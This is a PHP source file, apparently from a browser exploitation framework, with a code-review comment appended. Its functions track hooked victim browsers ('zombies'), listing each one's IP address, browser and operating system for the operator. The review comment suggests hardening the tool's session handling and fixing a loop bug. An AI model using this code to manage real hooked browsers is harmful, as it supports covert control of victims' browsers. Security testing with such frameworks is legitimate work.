$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return $zombie_heartbeat_contents[3];
}
// ---[ GET_ZOMBIE_BROWSER
// the output of this function must be escaped
function get_zombie_browser($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return trim($zombie_heartbeat_contents[1]) . " " . trim($zombie_heartbeat_contents[2]);
}
// ---[ GET_ZOMBIE_METADATA
function get_zombie_metadata($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_data = trim($zombie_details['ip']);
$zombie_data .= ',' . $zombie_details['agent_image'];
$zombie_data .= ',' . $zombie_details['os_image'];
return $zombie_data;
}
// ---[ GET_ZOMBIE_IP
function get_zombie_ip($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
return trim($zombie_details['ip']);
}
// --[ GET_ZOMBIE_VAR
function get_zombie_var() {
if(!isset($_GET["zombie"])) { beef_error('no zombie submitted'); }
$zombie = $_GET["zombie"];
if(!isset($_SESSION[$zombie])) { beef_error('zombie not in session'); }
return $zombie;
}
// --[ GET_ZOMBIE_DATAFILE
function get_zombie_datafile($filename) {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . $filename;
if(!file_exists($zombie_file)) {
return DNA_STRING;
}
return file_get_contents($zombie_file);
}
// --[ DELETE_ZOMBIE_RESULTS
function delete_zombie_results() {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . RES_FILENAME;
if(file_exists($zombie_file)) {
unlink($zombie_file);
}
}
// ---[ GET_ZOMBIE_LIST
function get_zombie_list() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = md5($dir_name);
if(!empty($result)) $result .= ",";
$result .= $zombie_details['id'];
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = 'none'; }
return $result;
}
// --[ GET_ZOMBIE_MENU
function get_zombie_menu() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = trim(md5($dir_name));
$result .= '<li><a href="javascript:change_zombie(\'' . $zombie_details['id'] . '\')">' .
'<img src="/beef/images/' . $zombie_details['agent_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
'<img src="/beef/images/' . $zombie_details['os_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
$zombie_details['ip'] . '</a></li>';
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = ZOMBIE_NONE; }
return $result;
}
// ---[ GET_ZOMBIE_DATA
function get_zombie_data($file){
$browser_details = file_get_contents($file);
$zombie_data['ip'] = extract_zombie_ip($browser_details);
$zombie_data['agent_image'] = extract_zombie_useragent($browser_details);
$zombie_data['os_image'] = extract_zombie_os($browser_details);
return $zombie_data;
}
// ---[ EXTRACT_ZOMBIE_IP
function extract_zombie_ip($raw_zombie_data) {
// get ip address from data
return substr("$raw_zombie_data",0,strpos($raw_zombie_data,"\n")+strlen("\n"));
}
// ---[ EXTRACT_ZOMBIE_USERAGENT
function extract_zombie_useragent($raw_zombie_data) {
// find agent type
if(stristr($raw_zombie_data, AGENT_FIREFOX_UA_STR)) {
return AGENT_FIREFOX_IMG;
}
if(stristr($raw_zombie_data, AGENT_IE_UA_STR)) {
return AGENT_IE_IMG;
}
if(stristr($raw_zombie_data, AGENT_CHROME_UA_STR)) {
return AGENT_CHROME_IMG;
}
if(stristr($raw_zombie_data, AGENT_SAFARI_UA_STR)) {
return AGENT_SAFARI_IMG;
}
if(stristr($raw_zombie_data, AGENT_KONQ_UA_STR)) {
return AGENT_KONQ_IMG;
}
if(stristr($raw_zombie_data, AGENT_MOZILLA_UA_STR)) {
return AGENT_MOZILLA_IMG;
}
return AGENT_UNKNOWN_IMG;
}
// ---[ EXTRACT_ZOMBIE_OS
function extract_zombie_os($raw_zombie_data) {
// find os type
if(stristr($raw_zombie_data, OS_WINDOWS_UA_STR)) {
return OS_WINDOWS_IMG;
}
if(stristr($raw_zombie_data, OS_LINUX_UA_STR)) {
return OS_LINUX_IMG;
}
if(stristr($raw_zombie_data, OS_MAC_UA_STR)) {
return OS_MAC_IMG;
}
return OS_UNKNOWN_IMG;
}
?>
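Review bot: get_zombie_var() accepts any `$_GET["zombie"]` for which `$_SESSION[$zombie]` is set, but the session array is a shared namespace (common.inc.php also stores `$_SESSION['append']` and result paths in it), so a key that is not a zombie id can pass and its value is then joined onto ZOMBIE_TMP_DIR by get_zombie_datafile() and delete_zombie_results(). Check the format first, `if(!preg_match('/^[a-f0-9]{32}$/', $zombie)) { beef_error(); }`, and keep the id-to-directory map in its own sub-array such as `$_SESSION['zombies']`. In get_zombie_list() and get_zombie_menu() the loop `while($dir_name = readdir($d))` stops early on an entry named `0` and should compare with `!== false`. beef_error() is declared without parameters in common.inc.php, so the messages passed to it here are discarded.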

3718
include/xmlrpc.inc.php Normal file

File diff suppressed because it is too large Load Diff